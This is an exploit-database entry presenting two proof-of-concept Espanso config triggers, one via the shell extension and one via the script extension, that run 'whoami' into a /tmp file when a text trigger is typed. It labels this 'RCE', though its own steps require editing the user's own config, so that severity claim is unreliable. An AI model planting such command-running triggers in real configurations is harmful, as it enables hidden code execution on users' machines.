Share
## https://sploitus.com/exploit?id=PACKETSTORM:220990
# Exploit Title: Espanso v2.3.0 - Shell & Script Extension Arbitrary
    Command Execution (RCE)
    # Date: 2026-05-13
    # Exploit Author: Chokri Hammedi
    # Software: https://github.com/espanso/espanso/releases/tag/v2.3.0
    # Vendor: https://espanso.org/
    # Version: 2.3.0
    # Tested on: linux
    #
    # Description:
    # The Shell and Script extensions in Espanso v2.3.0 allow arbitrary command
    # execution. No restart required. Config changes take effect immediately.
    
    
    POC #1 - SHELL EXTENSION:
    
    STEPS:
    1. espanso edit
    
    2. Add trigger:
       - trigger: ":pwn"
         replace: "{{output}}"
         vars:
           - name: output
             type: shell
             params:
               cmd: "whoami > /tmp/whoami.txt && echo PWNED"
    
    3. Type :pwn in any text editor
    
    4. cat /tmp/whoami.txt
       Output: user
    
    
    POC #2 - SCRIPT EXTENSION:
    
    STEPS:
    1. espanso edit
    
    2. Add trigger:
       - trigger: ":run"
         replace: "{{output}}"
         vars:
           - name: output
             type: script
             params:
               args:
                 - "sh"
                 - "-c"
                 - "whoami > /tmp/script_pwned.txt && echo SCRIPT_RCE"
    
    3. Type :run in any text editor
    
    4. cat /tmp/script_pwned.txt
       Output: user